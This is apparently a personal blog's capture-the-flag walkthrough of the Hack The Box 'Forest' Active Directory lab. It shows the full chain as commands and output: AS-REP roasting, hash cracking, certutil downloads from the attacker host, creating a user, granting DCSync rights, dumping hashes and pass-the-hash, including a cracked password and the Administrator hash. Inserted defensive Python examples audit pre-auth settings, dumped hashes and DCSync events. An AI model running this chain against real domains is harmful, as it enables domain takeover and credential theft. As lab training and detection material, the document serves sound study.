[HTB] Forest Walkthrough


Introduction

This box is Forest from Hack The Box, rated Easy, and it is also the first box in the AD 101 track.

Techniques used:

  1. ldapsearch
  2. john crack hash
  3. SharpHound + BloodHound CE
  4. DCSync

Attacker: 10.10.16.3
Target: 10.10.10.161

Recon

  1. nmap
sudo nmap -sV -sC 10.10.10.161
PORT      STATE SERVICE      REASON          VERSION
88/tcp    open  kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2024-04-22 05:29:52Z)
135/tcp   open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn  syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap         syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds syn-ack ttl 127 Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp   open  kpasswd5?    syn-ack ttl 127
593/tcp   open  ncacn_http   syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped   syn-ack ttl 127
3268/tcp  open  ldap         syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped   syn-ack ttl 127
5985/tcp  open  http         syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf       syn-ack ttl 127 .NET Message Framing
47001/tcp open  http         syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49671/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49678/tcp open  ncacn_http   syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49679/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49684/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49707/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49983/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 5597/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 32753/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 51508/udp): CLEAN (Timeout)
|   Check 4 (port 44587/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: FOREST
|   NetBIOS computer name: FOREST\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: FOREST.htb.local
|_  System time: 2024-04-21T22:30:47-07:00
| smb2-time: 
|   date: 2024-04-22T05:30:48
|_  start_date: 2024-04-22T05:05:05
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
|_clock-skew: mean: 2h22m36s, deviation: 4h02m30s, median: 2m35s

From this we can tell that the box is the Domain Controller for htb.local.
Port 5985 is open as well, which suggests WinRM is enabled.

  2. ldapsearch

Port 3268 (LDAP) is open, so use ldapsearch to help with enumeration:

ldapsearch -H ldap://10.10.10.161 -x -s base namingcontexts

-x: simple authentication
-s: search scope

namingContexts: DC=htb,DC=local
namingContexts: CN=Configuration,DC=htb,DC=local
namingContexts: CN=Schema,CN=Configuration,DC=htb,DC=local
namingContexts: DC=DomainDnsZones,DC=htb,DC=local
namingContexts: DC=ForestDnsZones,DC=htb,DC=local

Next, GetNPUsers:

impacket-GetNPUsers htb.local/ -dc-ip 10.10.10.161 -request

This returns the password hash (AS-REP) of the user svc-alfresco:

$krb5asrep$23$svc-alfresco@HTB.LOCAL:c5415db6bb764e14a48fb634733aa7e7$c0608bb5a59e8c04a8ab26f187fb054e7be2c2c3ba0c533fb757079b471f5a3be620715925c4b6d914b9fe8e65762e4401b2a45b9d88038f78e63a9e5913c99d803737071d073c0c8085b682e6384c6ae7328e8188cb6d2c462b4b0ccc9fb59a260a901c2bd0651436604359f01ca60806567b4923f9df22ed2f2678d200b609f20ea89a1f0f3ec2e7f89c67a5df6e2a6ed55654bd91505b81ad9eb87ed999a8bf29003ed24eeae0b99e4f8d25763bf2031c2d643375a65cd5d9ee4f276bd96bc7e1da3397a366e2ec58f01a7f700a944784939094fae05d2395e4c7838a015afcd39b77c5fe

Next, crack it with john and rockyou.txt:

john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
s3rvice          ($krb5asrep$23$svc-alfresco@HTB.LOCAL)
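Two defensive checks that belong with this step, as an added Python example that is not part of the original post: a parser for the `$krb5asrep$` line format shown above (so that from a captured hash line one can read off the principal and the encryption type, and why etype 23 makes the offline wordlist attack cheap), and an audit that lists accounts whose userAccountControl has the DONT_REQUIRE_PREAUTH bit, which is the misconfiguration GetNPUsers relies on. The sample hash line and the LDAP entries are constructed for this example: the checksum is the one from the hash above, the ciphertext is truncated to 16 bytes, and the account names other than svc-alfresco are made up.

```python
import re
from dataclasses import dataclass

# userAccountControl bit meaning "Kerberos pre-authentication not required";
# GetNPUsers above finds accounts with this bit set. 0x400000 = 4194304.
# Equivalent LDAP filter for a defensive audit with ldapsearch:
#   (&(objectCategory=person)(userAccountControl:1.2.840.113556.1.4.803:=4194304))
UF_DONT_REQUIRE_PREAUTH = 0x400000

# Hash line format written by impacket-GetNPUsers and read by john above:
#   $krb5asrep$<etype>$<user>@<REALM>:<checksum-hex>$<ciphertext-hex>
ASREP_RE = re.compile(
    r"^\$krb5asrep\$(?P<etype>\d+)\$(?P<user>[^@]+)@(?P<realm>[^:]+):"
    r"(?P<checksum>[0-9a-fA-F]+)\$(?P<cipher>[0-9a-fA-F]+)$"
)


@dataclass
class AsrepHash:
    etype: int
    user: str
    realm: str
    checksum_bytes: int
    cipher_bytes: int

    @property
    def crackable_offline(self) -> bool:
        # etype 23 (RC4-HMAC) keys the AS-REP enc-part directly with the NT hash,
        # which is why a wordlist run like the john command above is cheap.
        return self.etype == 23


def parse_asrep(line: str) -> AsrepHash:
    """Split one $krb5asrep$ line into its fields (sizes are in bytes)."""
    m = ASREP_RE.match(line.strip())
    if not m:
        raise ValueError("not a $krb5asrep$ hash line")
    return AsrepHash(
        etype=int(m["etype"]),
        user=m["user"],
        realm=m["realm"],
        checksum_bytes=len(m["checksum"]) // 2,
        cipher_bytes=len(m["cipher"]) // 2,
    )


def accounts_without_preauth(entries):
    """Return sAMAccountNames whose userAccountControl has DONT_REQUIRE_PREAUTH set.

    `entries` are dicts carrying the attributes an ldapsearch over the user
    objects would return; the sample below is constructed for this example.
    """
    return sorted(
        e["sAMAccountName"]
        for e in entries
        if int(e.get("userAccountControl", 0)) & UF_DONT_REQUIRE_PREAUTH
    )


# Constructed sample input: user and realm match the box, the checksum is the
# one shown above, the ciphertext is truncated to 16 bytes to keep it short.
SAMPLE_ASREP = (
    "$krb5asrep$23$svc-alfresco@HTB.LOCAL:"
    "c5415db6bb764e14a48fb634733aa7e7$c0608bb5a59e8c04a8ab26f187fb054e"
)

# Constructed LDAP entries: 512 = NORMAL_ACCOUNT, 0x10000 = DONT_EXPIRE_PASSWD.
SAMPLE_ENTRIES = [
    {"sAMAccountName": "alice", "userAccountControl": 512},
    {"sAMAccountName": "svc-alfresco", "userAccountControl": 512 | 0x10000 | 0x400000},
    {"sAMAccountName": "bob", "userAccountControl": 512 | 0x10000},
]

if __name__ == "__main__":
    h = parse_asrep(SAMPLE_ASREP)
    print(f"{h.user}@{h.realm} etype={h.etype} crackable_offline={h.crackable_offline}")
    print("accounts without pre-auth:", accounts_without_preauth(SAMPLE_ENTRIES))
```

The audit side is the one to schedule: an account that shows up in `accounts_without_preauth` should either have the flag removed or, if a legacy application really needs it, a long random password and AES-only encryption types so the AS-REP is not RC4-keyed.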

Exploit

Try logging in with the credential obtained:

evil-winrm -i 10.10.10.161 -u svc-alfresco -p s3rvice

User shell obtained.

Privilege Escalation

Continue recon with BloodHound:

bloodhound-python -d htb.local -u svc-alfresco -p s3rvice -gc forest.htb.local -c all -ns 10.10.10.161

It threw an error, so I'll just run the collector on the target instead. Before that, start neo4j and BloodHound:

sudo neo4j console
bloodhound

Next, upload SharpHound.exe:
https://github.com/BloodHoundAD/SharpHound/releases/tag/v2.3.3

certutil.exe -urlcache -split -f http://10.10.16.3:8000/SharpHound.exe

Run SharpHound:

.\SharpHound.exe -c all

This produces a zip file.

Evil-WinRM is quite handy here: its download command sends the file straight back to the attacker machine, so there is no need to set up an smbserver for the transfer.

download 20240423174653_BloodHound.zip

Upload the zip file to BloodHound.

Note: if the upload fails it may be a version mismatch; I recommend using the latest versions of both BloodHound and SharpHound.
How to use the latest BloodHound (if docker exits when you log in, your RAM may be insufficient):

wget https://ghst.ly/getbhce -O docker-compose.yml
docker-compose up -d

In Cypher, set Domain Admins as the end node and search; it lists the path, which is really neat.

But I don't know how to abuse CanPSRemote :(
Following BloodHound's hints just gives errors.

So I removed CanPSRemote and searched again.

WriteDACL can be used for a DCSync attack, so the route is pretty clear:

  1. Create a user and add it to the EXCHANGE WINDOWS PERMISSIONS group
  2. Run a DCSync attack to dump the passwords

Create the user:

net user flydragon password123 /add /domain

Add the newly created user to the EXCHANGE WINDOWS PERMISSIONS group:

net group "EXCHANGE WINDOWS PERMISSIONS" /add flydragon

Next, follow the suggestion BloodHound gives:

$SecPassword = ConvertTo-SecureString 'password123' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('htb\flydragon', $SecPassword)
Add-DomainObjectAcl -Credential $Cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity flydragon -Rights DCSync

The last line errored; after looking it up I found that the PowerView module has to be imported first
(Kali already ships it at /usr/share/windows-resources/powersploit/Recon/PowerView.ps1):

certutil.exe -urlcache -split -f http://10.10.16.3:8000/PowerView.ps1
Import-Module .\PowerView.ps1

Send this again:

Add-DomainObjectAcl -Credential $Cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity flydragon -Rights DCSync

Now we can start dumping passwords!

impacket-secretsdump htb.local/flydragon:password123@10.10.10.161

There will be many entries, but the important one is Administrator's password hash:

htblocal\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
impacket-psexec htb.local/Administrator@10.10.10.161 -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6
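As an added example (not from the post), a parser for the secretsdump NTDS line format shown above together with the hygiene audit a defender runs over such a dump after an incident: LM hashes still being stored, accounts with an empty password, and NT hashes shared by several accounts (the password reuse that lets one cracked or replayed hash open many accounts). The Administrator line mirrors the one above; the other accounts and their hashes are constructed.

```python
import re
from collections import defaultdict

# One NTDS line as printed by impacket-secretsdump above:
#   <domain>\<user>:<rid>:<lm-hash>:<nt-hash>:::
DUMP_RE = re.compile(
    r"^(?:(?P<domain>[^\\:]+)\\)?(?P<user>[^:]+):(?P<rid>\d+):"
    r"(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$",
    re.IGNORECASE,
)
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM field when no LM hash is stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password


def parse_dump(text: str):
    """Parse secretsdump NTDS lines; lines that do not match the format are skipped."""
    records = []
    for line in text.splitlines():
        m = DUMP_RE.match(line.strip())
        if m:
            d = m.groupdict()
            d["rid"] = int(d["rid"])
            d["lm"], d["nt"] = d["lm"].lower(), d["nt"].lower()
            records.append(d)
    return records


def audit(records):
    """Flag stored LM hashes, empty passwords, and NT hashes shared by several accounts."""
    by_nt = defaultdict(list)
    findings = {"lm_present": [], "empty_nt": [], "shared_nt": {}}
    for r in records:
        if r["lm"] != EMPTY_LM:
            findings["lm_present"].append(r["user"])
        if r["nt"] == EMPTY_NT:
            findings["empty_nt"].append(r["user"])
        by_nt[r["nt"]].append(r["user"])
    findings["shared_nt"] = {
        h: sorted(users) for h, users in by_nt.items()
        if len(users) > 1 and h != EMPTY_NT
    }
    return findings


# Constructed sample dump: the Administrator line mirrors the one above; the
# Guest, svc-backup and legacy accounts and their hashes are made up.
SAMPLE_DUMP = r"""
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
htb.local\Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\svc-backup:1105:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
htb.local\legacy:1106:e52cac67419a9a224a3b108f3fa6cb6d:0123456789abcdef0123456789abcdef:::
"""

if __name__ == "__main__":
    for key, value in audit(parse_dump(SAMPLE_DUMP)).items():
        print(f"{key}: {value}")
```

A shared NT hash between a privileged account and a service account is the finding to act on first, because the psexec pass-the-hash step above works just as well with either account's name once the hash is known.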

Root shell obtained.
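From a defender's side, the sequence in this section leaves a clear trail in the Security log of the DC: a 4720 for the new account, a 5136 for the nTSecurityDescriptor change on the domain object (the WriteDACL step), and a 4662 carrying the DS-Replication-Get-Changes rights when DCSync runs. The following Python is an added example, not part of the original post, that correlates those three events over constructed samples; the event dict layout, the 30 minute window and the empty allowlist are assumptions (a real pipeline would map the fields from the EVTX/XML and fill the allowlist with whatever legitimately replicates in that environment).

```python
from datetime import datetime, timedelta

# Extended rights on the domain naming context that a DCSync needs; these GUIDs
# appear in the Properties field of event 4662 when replication is requested.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Assumed allowlist of non-DC accounts that legitimately replicate (for example
# a directory-sync service account); empty here, extend per environment.
KNOWN_REPLICATORS = set()


def _guid(raw: str) -> str:
    return raw.strip().strip("{}").lower()


def is_machine_account(name: str) -> bool:
    # DCs replicate under their computer account (e.g. HTB\FOREST$).
    return name.rstrip().endswith("$")


def replication_alerts(events, window=timedelta(minutes=30)):
    """Return one alert per replication request by a non-DC, non-allowlisted account.

    `events` are dicts with at least id, time and subject. A 5136 that modified
    nTSecurityDescriptor within `window` before the 4662 raises the severity to
    critical; a 4720 for the same account within `window` is recorded as context.
    """
    acl_changes = []
    new_accounts = {}  # sAMAccountName (lower) -> creation time
    alerts = []
    for ev in sorted(events, key=lambda e: e["time"]):
        if ev["id"] == 4720:
            new_accounts[ev["target"].lower()] = ev["time"]
        elif ev["id"] == 5136 and ev.get("attribute") == "nTSecurityDescriptor":
            acl_changes.append(ev)
        elif ev["id"] == 4662:
            who = ev["subject"]
            rights = [
                REPLICATION_RIGHTS[_guid(g)]
                for g in ev.get("properties", [])
                if _guid(g) in REPLICATION_RIGHTS
            ]
            if not rights or is_machine_account(who) or who in KNOWN_REPLICATORS:
                continue
            recent_acl = [
                c for c in acl_changes
                if timedelta(0) <= ev["time"] - c["time"] <= window
            ]
            created = new_accounts.get(who.split("\\")[-1].lower())
            alerts.append({
                "time": ev["time"],
                "subject": who,
                "object": ev.get("object"),
                "rights": rights,
                "severity": "critical" if recent_acl else "high",
                "acl_changed_by": sorted({c["subject"] for c in recent_acl}),
                "newly_created": created is not None and ev["time"] - created <= window,
            })
    return alerts


# Constructed sample events mirroring this section: an account is created, the
# domain object's ACL is modified, then that account requests replication.
T0 = datetime(2024, 4, 23, 10, 0, 0)
SAMPLE_EVENTS = [
    {"id": 4720, "time": T0, "subject": "HTB\\svc-alfresco", "target": "flydragon"},
    {"id": 5136, "time": T0 + timedelta(minutes=3), "subject": "HTB\\flydragon",
     "object": "DC=htb,DC=local", "attribute": "nTSecurityDescriptor"},
    {"id": 4662, "time": T0 + timedelta(minutes=5), "subject": "HTB\\flydragon",
     "object": "DC=htb,DC=local",
     "properties": ["{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}",
                    "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"]},
    # Normal DC-to-DC replication under a machine account: suppressed.
    {"id": 4662, "time": T0 + timedelta(minutes=6), "subject": "HTB\\FOREST$",
     "object": "DC=htb,DC=local",
     "properties": ["{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"]},
    # Unrelated 4662 with a placeholder (non-replication) GUID: ignored.
    {"id": 4662, "time": T0 + timedelta(minutes=7), "subject": "HTB\\alice",
     "object": "CN=alice,CN=Users,DC=htb,DC=local",
     "properties": ["{00000000-0000-0000-0000-000000000000}"]},
]

if __name__ == "__main__":
    for a in replication_alerts(SAMPLE_EVENTS):
        print(a["severity"], a["subject"], a["rights"],
              "acl changed by", a["acl_changed_by"], "new account:", a["newly_created"])
```

Both 4662 and 5136 only appear if the directory service object access and object changes audit subcategories are enabled and the domain object carries a SACL for them; without that, the only trace of this chain is the 4720 and the group membership change, which is why auditing replication rights is usually the first thing a DC hardening checklist asks for.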

Afterword

It took me two days to finish this box. Is it really Easy? Orz

https://flydragonw.github.io/posts/htb_forest/
Author: FlyDragon
Published at: 2024-04-24